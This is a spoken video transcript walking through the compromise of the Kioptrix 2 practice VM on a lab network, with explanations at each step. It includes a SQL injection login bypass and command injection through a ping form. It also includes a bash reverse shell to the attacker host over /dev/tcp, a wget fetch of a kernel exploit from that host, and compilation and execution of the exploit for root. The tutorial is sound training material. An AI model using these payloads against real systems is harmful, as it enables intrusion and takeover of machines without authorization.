Hi, today I'm going to show you how to break into Kioptrix level 1.1, also known as Kioptrix 2. If you're interested, I did a video on Kioptrix 1, so feel free to check that out. I will also be continuing to make videos covering all the remaining Kioptrix machines. As always, I will show you what I did to get root access, as well as giving an explanation for each step. Let's get started. As you might expect if you have seen any of my other videos, our first step is to identify our target machine. We start by checking our host machine's IP address using the ifconfig command. We can see that we have an IP address of 10.0.2.25 with a default subnet mask, so let's search the 10.0.2 network with nmap. Let's use the command nmap 10.0.2.0/24, which will search the range of IP addresses from 10.0.2.0 to 10.0.2.255. We can see our target machine there with an IP address of 10.0.2.26 and that it has quite a few ports open. We can take a look at this open HTTP port by accessing the target IP through our web browser. We see that it comes up with a login page for something called Remote System Administration. We currently don't have any credentials, so we're going to try SQL injection. SQL, or Structured Query Language, is the language used to communicate with databases. When we type our login credentials into a website, that data is sent to a database which checks to see whether they match the credentials stored in the database. The way this works is the web application says, select any entry in the user database in which the user ID is equal to our entered username, and password is equal to our entered password. If the query finds a record that matches both of these values, it will return a value of true to the web application, which can then proceed with the next action. In this case, it would log us into the website. If the combination of username and password that we entered does not exist in the user database, it instead returns a value of false, and the web application will give some sort of error, such as password incorrect. This brings us to SQL injection. This time, instead of entering a password, I can enter escape character or 1 = 1. Just like before, it sends a query to select any entry in the user database where the user ID is equal to our entered username. But this time, when the statement is sent to the database, it is going to treat everything after the escape character as a command to be processed. Now, instead of asking whether the entered username and entered password are the same as the username and password in the database, it is instead asking, is the entered username the same as the one in the database, and is the password the same, or is 1 = 1? Because 1 is always equal to 1, this will return a true value and we are successfully logged in. Back on our web application, we are going to use SQL injection to enter this web application. We will use the escape character, or 1 = 1 hash. The hash tells the query that anything after it is to be treated as a comment, and this just prevents any syntax errors. We enter the same thing for the password and click login. This takes us to a new page, which allows us to ping a machine on the network. We can test it out by pinging something we know will work, such as Google's DNS server, which is 8.8.8.8. Sure enough, it successfully pings the server. While being able to ping isn't much use to us, the fact that we can input data for the web application to process means it may be susceptible to command injection. Just like SQL injection, command injection takes advantage of poorly configured systems in which there is little or no control over what a user can input. In this case, the application is intended to take an IP address as input, which it then passes on to a system shell and generates a ping command. But in an unsecured application, we can enter something other than an IP address. Let's try a basic command, ;pwd. The semicolon is used to separate commands, so the system will try to ping our entered value, in this case there isn't one, and then execute the next command, which in our case is to print working directory. We see that our current directory is var/www/html. Now that we know we can run our own commands, let's try to establish a reverse shell. In a typical remote shell, our host machine would reach out and attempt to create a network connection with the target machine. An example of this would be connecting via SSH. In a reverse shell, the contact is initiated from the target machine back to our host machine. Pentest Monkey have an excellent cheat sheet for creating reverse shells that I will link in the description. First, we need to tell our host machine to listen out for a connection, so we are going to set up Netcat to do this for us. Use the command nc-lnvp 9000. The NC is for netcat, L is for listen mode, N skips DNS lookup, V is for verbose mode, and P lets us specify the port, in this case 9000, but it can be any unused port. Back on our web application, we're going to use the command --bash -i greater than and /dev/tcp/10.0.2.25/9000 0 greater than and 1. Bash is the terminal we want to use. The -i says make the shell interactive, i.e. the user can input commands and it isn't just running a script. The greater than and is the syntax used for redirection. The dev/tcp opens a TCP connection to our designated IP address on our chosen port. The 0 greater than and 1 redirects the standard input to the standard output. What that means is that whenever the host that executed this command receives any data through the TCP socket, the bash reads it as input. All of that really means is that we now have a functioning bash shell on our host machine that we can use to interact with our target machine. If you want more information on creating different reverse shells, go check out the Pentest Monkey page. If we use the command whoami, we can see that we are a web user, but we want root access, so we will start by identifying what version of Linux is being run. We will use the command lsb_release-a. We see that we are running CentOS version 4.5. We could also look up the Linux kernel version using uname-a, and we can see that it is version 2.6.9. Let's use searchsploit to see if we can find an exploit that matches those details. On your host machine, use the command searchsploit CentOS 4.5 privilege escalation. There are 3 results, and the first is applicable for Linux kernel 2.6 and CentOS version 4, so that looks promising. Let's download the exploit to our system using searchsploit-m linux/local/9479.c. Now we just need to upload the exploit to our target system. On our host machine, let's set up a simple Python server using the command python-m http.server80. On our target machine, we need to navigate to a directory that we have write permissions for, otherwise we won't be able to upload anything. The temp folder is usually a good bet, so change directory using the cd/tmp command. Now we can use wget to fetch our exploit. The command is wget 10.0.2.25:80/9479.c. If we use the ls command, we can see that we have successfully uploaded our exploit. We are almost done, but before we can run our exploit, we need to compile it, which is the process of transforming code from something human readable into something machine readable. We're going to use the command gcc 9479.c-o exploit. This tells the system to compile the code in 9479.c and output it into a file called exploit. Next, we need to be able to execute our newly created exploit file, so we will use the command chmod +x exploit. This is the change mode command, and we are adding execute permissions to the file named exploit. Now, let's run it using /exploit. You can see that our shell has changed from bash3 to sh3. Use the command whoami, and you can verify that we are now root. So, in summary, we scanned for open ports using Nmap, used SQL injection to access a web application, used command injection to establish a reverse shell, enumerated the version of Linux, and used searchsploit to find an appropriate exploit, uploaded, compiled, and then executed that exploit. I hope you found this video helpful, and if you enjoyed it, then check out my other videos. My next video will be on Kioptrix level 1.3, but until then, good luck with your own hacking exploits.